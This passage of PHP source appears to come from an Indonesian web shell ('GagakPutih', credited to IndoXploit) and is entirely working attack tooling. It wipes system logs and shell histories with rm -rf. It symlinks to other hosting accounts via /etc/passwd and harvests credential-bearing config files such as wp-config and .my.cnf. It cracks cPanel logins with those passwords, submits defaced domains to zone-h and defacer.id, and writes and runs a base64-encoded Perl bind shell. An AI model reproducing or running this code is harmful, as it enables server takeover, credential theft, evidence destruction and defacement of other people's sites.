  3098.     shell_exec("rm -rf /var/log/lastlog");
  3099.     shell_exec("rm -rf /var/log/wtmp");
  3100.  
  3101.     passthru("rm -rf /tmp/logs");
  3102.     passthru("rm -rf /root/.ksh_history");
  3103.     passthru("rm -rf /root/.bash_history");
  3104.     passthru("rm -rf /root/.bash_logout");
  3105.     passthru("rm -rf /usr/local/apache/logs");
  3106.     passthru("rm -rf /usr/local/apache/log");
  3107.     passthru("rm -rf /var/apache/logs");
  3108.     passthru("rm -rf /var/apache/log");
  3109.     passthru("rm -rf /var/run/utmp");
  3110.     passthru("rm -rf /var/logs");
  3111.     passthru("rm -rf /var/log");
  3112.     passthru("rm -rf /var/adm");
  3113.     passthru("rm -rf /etc/wtmp");
  3114.     passthru("rm -rf /etc/utmp");
  3115.     passthru("rm -rf $HISTFILE");
  3116.     passthru("rm -rf /var/log/lastlog");
  3117.     passthru("rm -rf /var/log/wtmp");
  3118.  
  3119.  
  3120.     system("rm -rf /tmp/logs");
  3121.     sleep(2);
  3122.     echo'<br>Sudah Terpasang Pengaman .../tmp/logs ';
  3123.     sleep(2);
  3124.  
  3125.     system("rm -rf /root/.bash_history");
  3126.     sleep(2);
  3127.     echo'<p>Sudah Terpasang Pengaman .../root/.bash_history </p>';
  3128.  
  3129.     system("rm -rf /root/.ksh_history");
  3130.     sleep(2);
  3131.     echo'<p>Sudah Terpasang Pengaman .../root/.ksh_history </p>';
  3132.  
  3133.     system("rm -rf /root/.bash_logout");
  3134.     sleep(2);
  3135.     echo'<p>Sudah Terpasang Pengaman .../root/.bash_logout </p>';
  3136.  
  3137.     system("rm -rf /usr/local/apache/logs");
  3138.     sleep(2);
  3139.     echo'<p>Sudah Terpasang Pengaman .../usr/local/apache/logs </p>';
  3140.  
  3141.     system("rm -rf /usr/local/apache/log");
  3142.     sleep(2);
  3143.     echo'<p>Sudah Terpasang Pengaman .../usr/local/apache/log </p>';
  3144.  
  3145.     system("rm -rf /var/apache/logs");
  3146.     sleep(2);
  3147.     echo'<p>Sudah Terpasang Pengaman .../var/apache/logs </p>';
  3148.  
  3149.     system("rm -rf /var/apache/log");
  3150.     sleep(2);
  3151.     echo'<p>Sudah Terpasang Pengaman .../var/apache/log </p>';
  3152.  
  3153.     system("rm -rf /var/run/utmp");
  3154.     sleep(2);
  3155.     echo'<p>Sudah Terpasang Pengaman .../var/run/utmp </p>';
  3156.  
  3157.     system("rm -rf /var/logs");
  3158.     sleep(2);
  3159.     echo'<p>Sudah Terpasang Pengaman .../var/logs </p>';
  3160.  
  3161.     system("rm -rf /var/log");
  3162.     sleep(2);
  3163.     echo'<p>Sudah Terpasang Pengaman .../var/log </p>';
  3164.  
  3165.     system("rm -rf /var/adm");
  3166.     sleep(2);
  3167.     echo'<p>Sudah Terpasang Pengaman .../var/adm </p>';
  3168.  
  3169.     system("rm -rf /etc/wtmp");
  3170.     sleep(2);
  3171.     echo'<p>Sudah Terpasang Pengaman .../etc/wtmp </p>';
  3172.  
  3173.     system("rm -rf /etc/utmp");
  3174.     sleep(2);
  3175.     echo'<p>Sudah Terpasang Pengaman .../etc/utmp </p>';
  3176.  
  3177.     system("rm -rf $HISTFILE");
  3178.     sleep(2);
  3179.     echo'<p>Sudah Terpasang Pengaman ...$HISTFILE </p>';
  3180.  
  3181.     system("rm -rf /var/log/lastlog");
  3182.     sleep(2);
  3183.     echo'<p>Sudah Terpasang Pengaman .../var/log/lastlog </p>';
  3184.  
  3185.     system("rm -rf /var/log/wtmp");
  3186.     sleep(2);
  3187.     echo'<p>Sudah Terpasang Pengaman .../var/log/wtmp </p>';
  3188.  
  3189.     sleep(4);
  3190.  
  3191.     echo '<br><br><p>Sukses Masang Pengamannya ... Bebas Di Server';
  3192.     echo"</td></tr></table>";
  3193. }
  3194. elseif($_GET['GagakPutih'] == 'symlink') {
  3195. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3196. $d0mains = @file("/etc/named.conf");
  3197. ##httaces
  3198. if($d0mains){
  3199. @mkdir("Gagak_sym",0777);
  3200. @chdir("Gagak_sym");
  3201. @exe("ln -s / c7e");
  3202. $file3 = 'Options Indexes FollowSymLinks
  3203. DirectoryIndex c7e.htm
  3204. AddType text/plain .php
  3205. AddHandler text/plain .php
  3206. Satisfy Any';
  3207. $fp3 = fopen('.htaccess','w');
  3208. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3209. echo "
  3210. <table align=center border=1 style='width:60%;border-color:#000000;'>
  3211. <tr>
  3212. <td align=center><font size=2>S. No.</font></td>
  3213. <td align=center><font size=2>Domains</font></td>
  3214. <td align=center><font size=2>Users</font></td>
  3215. <td align=center><font size=2>Symlink</font></td>
  3216. </tr>";
  3217. $dcount = 1;
  3218. foreach($d0mains as $d0main){
  3219. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3220. flush();
  3221. if(strlen(trim($domains[1][0])) > 2){
  3222. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3223. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  3224. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3225. <td>".$user['name']."</td>
  3226. <td><a href='Gagak_sym/c7e/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3227. flush();
  3228. $dcount++;}}}
  3229. echo "</table>";
  3230. }else{
  3231. $TEST=@file('/etc/passwd');
  3232. if ($TEST){
  3233. @mkdir("Gagak_sym",0777);
  3234. @chdir("Gagak_sym");
  3235. exe("ln -s / c7e");
  3236. $file3 = 'Options Indexes FollowSymLinks
  3237. DirectoryIndex c7e.htm
  3238. AddType text/plain .php
  3239. AddHandler text/plain .php
  3240. Satisfy Any';
  3241.  $fp3 = fopen('.htaccess','w');
  3242.  $fw3 = fwrite($fp3,$file3);
  3243.  @fclose($fp3);
  3244.  echo "
  3245. <table align=center border=1><tr>
  3246. <td align=center><font size=3>S. No.</font></td>
  3247. <td align=center><font size=3>Users</font></td>
  3248. <td align=center><font size=3>Symlink</font></td></tr>";
  3249.  $dcount = 1;
  3250.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3251.  while(!feof($file)){
  3252.  $s = fgets($file);
  3253.  $matches = array();
  3254.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3255.  $matches = str_replace("home/","",$matches[1]);
  3256.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3257.  continue;
  3258.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3259. <td align=center><font class=txt>" . $matches . "</td>";
  3260.  echo "<td align=center><font class=txt><a href=Gagak_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3261.  $dcount++;}fclose($file);
  3262.  echo "</table>";}else{if($os != "Windows"){@mkdir("Gagak_sym",0777);@chdir("Gagak_sym");@exe("ln -s / c7e");$file3 = '
  3263. Options Indexes FollowSymLinks
  3264. DirectoryIndex c7e.htm
  3265. AddType text/plain .php
  3266. AddHandler text/plain .php
  3267. Satisfy Any
  3268. ';
  3269.  $fp3 = fopen('.htaccess','w');
  3270.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3271.  echo "
  3272. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  3273. <table align=center border=1><tr>
  3274. <td align=center><font size=3>ID</font></td>
  3275. <td align=center><font size=3>Users</font></td>
  3276. <td align=center><font size=3>Symlink</font></td></tr>";
  3277.  $temp = "";$val1 = 0;$val2 = 1000;
  3278.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3279.  if ($uid)$temp .= join(':',$uid)."\n";}
  3280.  echo '<br/>';$temp = trim($temp);$file5 =
  3281.  fopen("test.txt","w");
  3282.  fputs($file5,$temp);
  3283.  fclose($file5);$dcount = 1;$file =
  3284.  fopen("test.txt", "r") or exit("Unable to open file!");
  3285.  while(!feof($file)){$s = fgets($file);$matches = array();
  3286.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  3287.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3288.  continue;
  3289.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3290. <td align=center><font class=txt>" . $matches . "</td>";
  3291.  echo "<td align=center><font class=txt><a href=Gagak_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3292.  $dcount++;}
  3293.  fclose($file);
  3294.  echo "</table></div></center>";unlink("test.txt");
  3295.  } else
  3296.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  3297.  }
  3298.  }    
  3299. }
  3300. elseif($_GET['GagakPutih'] == 'config') {
  3301.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  3302.     $idx = mkdir("Gagak_conf", 0777);
  3303.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  3304.     $htc = fopen("Gagak_conf/.htaccess","w");
  3305.     fwrite($htc, $isi_htc);
  3306.     while($passwd = fgets($etc)) {
  3307.         if($passwd == "" || !$etc) {
  3308.             echo "<font color=red>Can't read /etc/passwd</font>";
  3309.         } else {
  3310.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  3311.             foreach($user_config[1] as $c7euser) {
  3312.                 $user_config_dir = "/home/$c7euser/public_html/";
  3313.                 if(is_readable($user_config_dir)) {
  3314.                     $grab_config = array(
  3315.                         "/home/$c7euser/.my.cnf" => "cpanel",
  3316.                         "/home/$c7euser/.accesshash" => "WHM-accesshash",
  3317.                         "/home/$c7euser/public_html/po-content/config.php" => "Popoji",
  3318.                         "/home/$c7euser/public_html/vdo_config.php" => "Voodoo",
  3319.                         "/home/$c7euser/public_html/bw-configs/config.ini" => "BosWeb",
  3320.                         "/home/$c7euser/public_html/config/koneksi.php" => "Lokomedia",
  3321.                         "/home/$c7euser/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3322.                         "/home/$c7euser/public_html/clientarea/configuration.php" => "WHMCS",
  3323.                         "/home/$c7euser/public_html/whm/configuration.php" => "WHMCS",
  3324.                         "/home/$c7euser/public_html/whmcs/configuration.php" => "WHMCS",
  3325.                         "/home/$c7euser/public_html/forum/config.php" => "phpBB",
  3326.                         "/home/$c7euser/public_html/sites/default/settings.php" => "Drupal",
  3327.                         "/home/$c7euser/public_html/config/settings.inc.php" => "PrestaShop",
  3328.                         "/home/$c7euser/public_html/app/etc/local.xml" => "Magento",
  3329.                         "/home/$c7euser/public_html/joomla/configuration.php" => "Joomla",
  3330.                         "/home/$c7euser/public_html/configuration.php" => "Joomla",
  3331.                         "/home/$c7euser/public_html/wp/wp-config.php" => "WordPress",
  3332.                         "/home/$c7euser/public_html/wordpress/wp-config.php" => "WordPress",
  3333.                         "/home/$c7euser/public_html/wp-config.php" => "WordPress",
  3334.                         "/home/$c7euser/public_html/admin/config.php" => "OpenCart",
  3335.                         "/home/$c7euser/public_html/slconfig.php" => "Sitelok",
  3336.                         "/home/$c7euser/public_html/application/config/database.php" => "Ellislab");
  3337.                     foreach($grab_config as $config => $nama_config) {
  3338.                         $ambil_config = file_get_contents($config);
  3339.                         if($ambil_config == '') {
  3340.                         } else {
  3341.                             $file_config = fopen("Gagak_conf/$c7euser-$nama_config.txt","w");
  3342.                             fputs($file_config,$ambil_config);
  3343.                         }
  3344.                     }
  3345.                 }      
  3346.             }
  3347.         }  
  3348.     }
  3349.     echo "<br><center><a href='?path=$path/Gagak_conf'><font>Done</font></a></center>";
  3350. }elseif($_GET['GagakPutih'] == 'adminer') {
  3351.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3352.     function adminer($url, $isi) {
  3353.         $fp = fopen($isi, "w");
  3354.         $ch = curl_init();
  3355.               curl_setopt($ch, CURLOPT_URL, $url);
  3356.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3357.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3358.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3359.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3360.         return curl_exec($ch);
  3361.               curl_close($ch);
  3362.         fclose($fp);
  3363.         ob_flush();
  3364.         flush();
  3365.     }
  3366.     if(file_exists('adminer.php')) {
  3367.         echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3368.     } else {
  3369.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3370.             echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3371.         } else {
  3372.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3373.         }
  3374.     }
  3375. }elseif($_GET['GagakPutih'] == 'crkcp') {
  3376. echo '<center>';
  3377.     if($_POST['crack']) {
  3378.         $usercp = explode("\r\n", $_POST['user_cp']);
  3379.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3380.         $i = 0;
  3381.         foreach($usercp as $ucp) {
  3382.             foreach($passcp as $pcp) {
  3383.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3384.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3385.                     } else {
  3386.                         $_SESSION[$ucp] = "1";
  3387.                         $_SESSION[$pcp] = "1";
  3388.                         if($ucp == '' || $pcp == '') {
  3389.                            
  3390.                         } else {
  3391.                             $i++;
  3392.                             if(function_exists('posix_getpwuid')) {
  3393.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  3394.                                 if($domain_cp == '') {
  3395.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  3396.                                 } else {
  3397.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3398.                                     foreach($domains_cp[1] as $dj) {
  3399.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3400.                                         $user_cp_url = $user_cp_url['name'];
  3401.                                         if($user_cp_url == $ucp) {
  3402.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  3403.                                             break;
  3404.                                         }
  3405.                                     }
  3406.                                 }
  3407.                             } else {
  3408.                                 $dom = "<font color=red>function is Disable by system</font>";
  3409.                             }
  3410.                             echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  3411.                         }
  3412.                     }
  3413.                 }
  3414.             }
  3415.         }
  3416.         if($i == 0) {
  3417.         } else {
  3418.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
  3419.         }
  3420.     } else {
  3421.         echo "<center>
  3422.         <form method='post'>
  3423.         USER: <br>
  3424.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3425.         $_usercp = fopen("/etc/passwd","r");
  3426.         while($getu = fgets($_usercp)) {
  3427.             if($getu == '' || !$_usercp) {
  3428.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3429.             } else {
  3430.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3431.                 foreach($u[1] as $user_cp) {
  3432.                         if(is_dir("/home/$user_cp/public_html")) {
  3433.                             echo "$user_cp\n";
  3434.                     }
  3435.                 }
  3436.             }
  3437.         }
  3438.         echo "</textarea><br>
  3439.         PASS: <br>
  3440.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3441.         function cp_pass($path) {
  3442.             $pass = "";
  3443.             $patha = scandir($path);
  3444.             foreach($patha as $pathb) {
  3445.                 if(!is_file("$path/$pathb")) continue;
  3446.                 $ambil = file_get_contents("$path/$path");
  3447.                 if(preg_match("/WordPress/", $ambil)) {
  3448.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3449.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3450.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3451.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3452.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3453.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3454.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3455.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3456.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3457.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  3458.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  3459.                     if(preg_match('/"/', $pass1[1])) {
  3460.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3461.                         $pass .= $pass1[1]."\n";
  3462.                     } else {
  3463.                         $pass .= $pass1[1]."\n";
  3464.                     }
  3465.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3466.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3467.                 }
  3468.             }
  3469.             echo $pass;
  3470.         }
  3471.         $cp_pass = cp_pass($path);
  3472.         echo $cp_pass;
  3473.         echo "</textarea><br>
  3474.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3475.         </form>
  3476.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3477.     }
  3478. }
  3479. elseif($_GET['GagakPutih'] == 'zoneh') {
  3480.     if($_POST['submit']) {
  3481. echo '<center>';
  3482.         $domain = explode("\r\n", $_POST['url']);
  3483.         $nick =  $_POST['nick'];
  3484.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3485.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3486.         function zoneh($url,$nick) {
  3487.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3488.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3489.                   curl_setopt($ch, CURLOPT_POST, true);
  3490.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3491.             return curl_exec($ch);
  3492.                   curl_close($ch);
  3493.         }
  3494.         foreach($domain as $url) {
  3495.             $zoneh = zoneh($url,$nick);
  3496.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3497.                 echo "$url -> <font>OK</font><br>";
  3498.             } else {
  3499.                 echo "$url -> <font color=red>ERROR</font><br>";
  3500.             }
  3501.         }
  3502.     } else {
  3503.         echo "<center><form method='post'>
  3504.         <u>Defacer</u>: <br>
  3505.         <input type='text' name='nick' size='50' value='4NG3L 0F SH4D0W'><br>
  3506.         <u>Domains</u>: <br>
  3507.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3508.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3509.         </form>";
  3510.     }
  3511.     echo "</center>";
  3512. }
  3513. elseif($_GET['GagakPutih'] == 'defid') {
  3514. echo "<center><form method='post'>
  3515.         <u>Defacer</u>: <br>
  3516.         <input type='text' name='hekel' size='50' value='4NG3L 0F SH4D0W'><br>
  3517.         <u>Team</u>: <br>
  3518.         <input type='text' name='tim' size='50' value='Eldersc0de Family'><br>
  3519.         <u>Domains</u>: <br>
  3520.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  3521.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  3522.         </form>";
  3523. $site = explode("\r\n", $_POST['sites']);
  3524. $go = $_POST['go'];
  3525. $hekel = $_POST['hekel'];
  3526. $tim = $_POST['tim'];
  3527. if($go) {
  3528. foreach($site as $sites) {
  3529. $zh = $sites;
  3530. $form_url = "https://www.defacer.id/notify";
  3531. $data_to_post = array();
  3532. $data_to_post['attacker'] = "$hekel";
  3533. $data_to_post['team'] = "$tim";
  3534. $data_to_post['poc'] = 'SQL Injection';
  3535. $data_to_post['url'] = "$zh";
  3536. $curl = curl_init();
  3537. curl_setopt($curl,CURLOPT_URL, $form_url);
  3538. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  3539. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  3540. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  3541. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3542. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  3543. $result = curl_exec($curl);
  3544. echo $result;
  3545. curl_close($curl);
  3546. echo "<br>";
  3547. }
  3548. }
  3549. }elseif($_GET['GagakPutih'] == 'jumping') {
  3550.     $i = 0;
  3551.     echo "<div class='margin: 5px auto;'>";
  3552.     if(preg_match("/hsphere/", $dir)) {
  3553.         $urls = explode("\r\n", $_POST['url']);
  3554.         if(isset($_POST['jump'])) {
  3555.             echo "<pre>";
  3556.             foreach($urls as $url) {
  3557.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  3558.                 $etc = "/etc/passwd";
  3559.                 $f = fopen($etc,"r");
  3560.                 while($gets = fgets($f)) {
  3561.                     $pecah = explode(":", $gets);
  3562.                     $user = $pecah[0];
  3563.                     $dir_user = "/hsphere/local/home/$user";
  3564.                     if(is_dir($dir_user) === true) {
  3565.                         $url_user = $dir_user."/".$url;
  3566.                         if(is_readable($url_user)) {
  3567.                             $i++;
  3568.                             $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3569.                             if(is_writable($url_user)) {
  3570.                                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3571.                             }
  3572.                             echo $jrw."<br>";
  3573.                         }
  3574.                     }
  3575.                 }
  3576.             }
  3577.         if($i == 0) {
  3578.         } else {
  3579.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3580.         }
  3581.         echo "</pre>";
  3582.         } else {
  3583.             echo '<center>
  3584.                   <form method="post">
  3585.                   List Domains: <br>
  3586.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3587.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3588.             while($getss = fgets($fp)) {
  3589.                 echo $getss;
  3590.             }
  3591.             echo  '</textarea><br>
  3592.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3593.                   </form></center>';
  3594.         }
  3595.     } elseif(preg_match("/vhosts/", $dir)) {
  3596.         $urls = explode("\r\n", $_POST['url']);
  3597.         if(isset($_POST['jump'])) {
  3598.             echo "<pre>";
  3599.             foreach($urls as $url) {
  3600.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  3601.                 if(is_dir($web_vh) === true) {
  3602.                     if(is_readable($web_vh)) {
  3603.                         $i++;
  3604.                         $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3605.                         if(is_writable($web_vh)) {
  3606.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3607.                         }
  3608.                         echo $jrw."<br>";
  3609.                     }
  3610.                 }
  3611.             }
  3612.         if($i == 0) {
  3613.         } else {
  3614.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3615.         }
  3616.         echo "</pre>";
  3617.         } else {
  3618.             echo '<center>
  3619.                   <form method="post">
  3620.                   List Domains: <br>
  3621.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3622.                   bing("ip:$ip");
  3623.             echo  '</textarea><br>
  3624.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3625.                   </form></center>';
  3626.         }
  3627.     } else {
  3628.         echo "<pre>";
  3629.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3630.         while($passwd = fgets($etc)) {
  3631.             if($passwd == '' || !$etc) {
  3632.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3633.             } else {
  3634.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3635.                 foreach($user_jumping[1] as $myuser_jump) {
  3636.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  3637.                     if(is_readable($user_jumping_dir)) {
  3638.                         $i++;
  3639.                         $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3640.                         if(is_writable($user_jumping_dir)) {
  3641.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3642.                         }
  3643.                         echo $jrw;
  3644.                         if(function_exists('posix_getpwuid')) {
  3645.                             $domain_jump = file_get_contents("/etc/named.conf");   
  3646.                             if($domain_jump == '') {
  3647.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3648.                             } else {
  3649.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3650.                                 foreach($domains_jump[1] as $dj) {
  3651.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3652.                                     $user_jumping_url = $user_jumping_url['name'];
  3653.                                     if($user_jumping_url == $myuser_jump) {
  3654.                                         echo " => ( <u>$dj</u> )<br>";
  3655.                                         break;
  3656.                                     }
  3657.                                 }
  3658.                             }
  3659.                         } else {
  3660.                             echo "<br>";
  3661.                         }
  3662.                     }
  3663.                 }
  3664.             }
  3665.         }
  3666.         if($i == 0) {
  3667.         } else {
  3668.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3669.         }
  3670.         echo "</pre>";
  3671.     }
  3672.     echo "</div>";
  3673. }elseif($_GET['GagakPutih'] == 'network') {
  3674.     echo "<form method='post'>
  3675.     <u>Bind Port:</u> <br>
  3676.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3677.     <input type='submit' name='sub_bp' value='>>'>
  3678.     </form>
  3679.     <form method='post'>
  3680.     <u>Back Connect:</u> <br>
  3681.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3682.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3683.     <input type='submit' name='sub_bc' value='>>'>
  3684.     </form>";
  3685.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3686.     if(isset($_POST['sub_bp'])) {
  3687.         $f_bp = fopen("/tmp/bp.pl", "w");
  3688.         fwrite($f_bp, base64_decode($bind_port_p));
  3689.         fclose($f_bp);
  3690.  
  3691.         $port = $_POST['port_bind'];
  3692.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3693.         sleep(1);
  3694.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3695.         unlink("/tmp/bp.pl");
  3696.     }
